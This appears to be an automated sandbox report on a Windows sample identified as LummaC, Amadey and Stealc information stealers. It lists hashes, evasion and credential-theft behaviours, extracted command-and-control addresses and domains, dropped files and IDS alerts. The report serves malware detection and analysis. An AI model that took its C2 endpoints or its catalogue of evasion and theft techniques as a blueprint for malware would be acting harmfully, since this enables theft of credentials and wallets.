Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545100
MD5: 7f339d0252f408065abe57ac23eed91c
SHA1: 1f07e6f292500fd235ec540cb56045a3081efa6d
SHA256: c94e84bee19b31c4663f8df36368ed87dd16e2021b5727a45c973ed8cf04dc0d
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000004.00000003.2386839542.0000000005390000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 32.2.num.exe.bf0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 58ce8f976c.exe.6068.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "fadehairucw.store", "thumbystriw.store", "crisiwarny.store", "founpiuer.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe ReversingLabs: Detection: 34%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 47% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50117 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: my_library.pdb source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2506913833.0000000000B12000.00000040.00000001.01000000.00000006.sdmp, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000003.2373622075.0000000005130000.00000004.00001000.00020000.00000000.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: number of queries: 1403
Source: firefox.exe Memory has grown: Private usage: 0MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:57186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:57079 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:60191 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:63856 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62598 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49721 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49754 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:58724 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:53810 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:58432 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49992
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:60114 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49996 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50001 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50003 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50005 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50007 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:54014 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:62377 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:51693 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:64260 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50011 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50013 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50016 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50010 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50021 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50027 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50029 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50031 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50040 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50042 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50045 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49999 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50049 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:63441 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50083 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:59530 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:51068 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50087 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50090 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50080 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50092 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50093 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50086 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50125 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:63887 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49754 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50007 -> 188.114.96.3:443
